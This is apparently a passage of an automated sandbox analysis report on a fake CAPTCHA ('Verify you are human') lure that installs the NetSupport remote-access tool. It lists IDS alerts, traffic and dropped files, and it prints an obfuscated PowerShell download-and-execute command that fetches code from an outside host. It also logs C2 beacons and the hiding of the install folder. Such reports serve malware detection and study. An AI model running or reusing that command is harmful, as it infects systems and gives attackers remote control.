00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0

Source: global traffic

HTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.16:49737 -> 166.1.160.211:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.16:49739 -> 166.1.160.211:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.16:49740 -> 166.1.160.211:80

Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.160.22
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.160.22
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200

Source: global traffic	HTTP traffic detected: GET /o/1.png HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: thecopycat.bizConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /o/2.png HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: thecopycat.biz
Source: global traffic	HTTP traffic detected: GET /o/3.png HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: thecopycat.biz
Source: global traffic	HTTP traffic detected: GET /o/4.png HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: thecopycat.biz
Source: global traffic	HTTP traffic detected: GET /o/5.png HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: thecopycat.biz
Source: global traffic	HTTP traffic detected: GET /o/6.png HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: thecopycat.biz
Source: global traffic	HTTP traffic detected: GET /o/7.png HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: thecopycat.biz
Source: global traffic	HTTP traffic detected: GET /o/8.png HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: thecopycat.biz
Source: global traffic	HTTP traffic detected: GET /o/9.png HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: thecopycat.biz
Source: global traffic	HTTP traffic detected: GET /o/10.png HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: thecopycat.biz
Source: global traffic	HTTP traffic detected: GET /o/11.png HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: thecopycat.biz
Source: global traffic	HTTP traffic detected: GET /o/12.png HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: thecopycat.biz
Source: global traffic	HTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache

Source: global traffic	DNS traffic detected: DNS query: webdemo.biz
Source: global traffic	DNS traffic detected: DNS query: use.fontawesome.com
Source: global traffic	DNS traffic detected: DNS query: i.ibb.co
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: thecopycat.biz
Source: global traffic	DNS traffic detected: DNS query: geo.netsupportsoftware.com

Source: unknown

HTTP traffic detected: POST http://92.255.85.135/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 22Host: 92.255.85.135Connection: Keep-AliveCMD=POLLINFO=1ACK=1Data Raw: Data Ascii:

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 49699 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49699
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49681 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49678 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49677 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49683 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49701

Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49717 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49718 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.16:49719 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.16:49720 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.1.33.206:443 -> 192.168.2.16:49721 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 51.104.15.253:443 -> 192.168.2.16:49722 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 204.79.197.222:443 -> 192.168.2.16:49728 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.1.33.206:443 -> 192.168.2.16:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 150.171.84.254:443 -> 192.168.2.16:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.16:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 166.1.160.75:443 -> 192.168.2.16:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 166.1.160.211:443 -> 192.168.2.16:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.16:49738 version: TLS 1.2

Source: Yara match	File source: C:\Users\user\AppData\Roaming\HzYATQ\PCICL32.DLL, type: DROPPED
Source: Yara match	File source: 00000013.00000002.2440967241.0000000011193000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY

System Summary

Powershell drops PE file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\HzYATQ\pcicapi.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\HzYATQ\client32.exe	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\HzYATQ\PCICL32.DLL	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\HzYATQ\HTCTL32.DLL	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\HzYATQ\msvcr100.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\HzYATQ\PCICHEK.DLL	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\HzYATQ\TCCTL32.DLL	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\HzYATQ\remcmdstub.exe	Jump to dropped file

Source: C:\Windows\System32\svchost.exe

File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Source: classification engine

Classification label: mal100.phis.troj.win@30/30@17/165

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps

Source: C:\Users\user\AppData\Roaming\HzYATQ\client32.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8044:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jmbeadtq.mgw.ps1

Source: C:\Windows\System32\mshta.exe

File read: C:\Users\user\Desktop\desktop.ini

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 --field-trial-handle=1936,i,13169113144443603828,12295898762207964987,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://webdemo.biz/"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 --field-trial-handle=1936,i,13169113144443603828,12295898762207964987,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: unknown	Process created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://webdemo.biz/Ray-verify.html # ? ''Verify you are human - Ray Verification ID: 2537''
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''https://thecopycat.biz/o/o.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC\|I`E`X
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\ipconfig.exe "C:\Windows\system32\ipconfig.exe" /flushdns
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c attrib +h C:\Users\user\AppData\Roaming\HzYATQ
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +h C:\Users\user\AppData\Roaming\HzYATQ
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''https://thecopycat.biz/o/o.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC\|I`E`X
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\ipconfig.exe "C:\Windows\system32\ipconfig.exe" /flushdns
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c attrib +h C:\Users\user\AppData\Roaming\HzYATQ
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +h C:\Users\user\AppData\Roaming\HzYATQ
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Roaming\HzYATQ\client32.exe "C:\Users\user\AppData\Roaming\HzYATQ\client32.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Roaming\HzYATQ\client32.exe "C:\Users\user\AppData\Roaming\HzYATQ\client32.exe"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown

Source: C:\Windows\System32\mshta.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: mshtml.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: msiso.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: srpapi.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: ieframe.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: netapi32.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: version.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: msimtf.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: dxgi.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: textinputframework.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: coreuicomponents.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: dataexchange.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: d3d11.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: dcomp.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: schannel.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll
